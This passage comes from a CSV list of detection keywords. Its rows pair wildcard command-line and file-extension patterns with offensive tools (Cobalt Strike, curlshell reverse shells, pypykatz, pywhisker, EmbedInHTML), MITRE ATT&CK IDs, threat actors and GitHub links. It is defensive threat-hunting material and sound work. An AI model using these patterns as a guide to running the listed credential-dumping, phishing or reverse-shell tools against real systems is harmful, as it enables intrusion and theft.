T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.pic.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.pipename_stager*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.pop.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.ppt.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ppt.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ppt.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ppt.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ppt.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ppt.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A 
-*.ppt.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ppt.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ps1 -Base *OU=*DC=* -Credentials * -Server *,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and 
system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*.ps1 -dcip * -Username * -Password* -ExportToCSV *.csv -ExportToJSON *.json*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,0,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*.py -credz *.txt * ,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*.py -k * -f *.bat -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.docm -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.docx -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.exe -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.js -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.pps -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.ppsx -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.ppt -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.ps1 -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.xll -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.xls -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.xlsb -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.xlsm -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.xlsx -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py rekall *.dmp* -t 0,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*.py * --fake-server*,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,0,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*.py * amsi -disable*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*.py * amsi -enable*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*.py * --brop *,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,0,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*.py * --burp *,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on 
LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,0,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*.py * -debug -dnstcp*,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,0,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -*.py * -k -no-pass*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*.py * --teamserver *,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*.py *.cs cs ms*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,0,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*.py *.exe *NormalDLL.dll*,offensive_tool_keyword,DllProxy,Proxy your dll exports and add some spicy content at the same time,T1574.002 - T1036.005,TA0005 - TA0004,N/A,N/A,Exploitation Tools,https://github.com/Iansus/DllProxy/,1,0,N/A,N/A,1,16,5,2023-06-28T14:19:36Z,2021-05-04T19:38:42Z -*.py *0.0.0.0*--serve-forever*,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - 
TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,0,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*.py *--dependabot-workaround*,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,0,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*.py 127.0.0.1 50050 logtracker password*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -"*.py -aesKey ""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab""*",offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - 
TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*.py --certificate *.pem --private-key *.pem --listen-port *,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,0,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*.py --client ftp --username * --password * --ip * --datatype ssn*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*.py --client https --data-size * --ip * --datatype cc*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -"*.py -d ""test.local"" -u ""john"" -p ""password123"" --target ""user2"" --action ""list"" --dc-ip ""10.10.10.1""*",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*.py -d * -u * -p * --target * --action * --export PEM*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential 
Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -"*.py -d * -u * -p * --target * --action ""add"" --filename * ",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -"*.py -d * -u * -p * --target * --action ""clear""* ",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -"*.py -d * -u * -p * --target * --action ""info"" --device-id *",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -"*.py -d * -u * -p * --target * --action ""list"" *",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -"*.py -d * -u * -p * --target * --action ""remove"" --device-id *",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*.py discover -H domain_list.txt*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - 
T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,0,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*.py enum -H * -U *.txt -P *.txt -*.txt*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,0,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*.py -f *.exe -e -m 4,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z -*.py --file *.ps1 --server amsi*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*.py -k * -f *.doc -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does 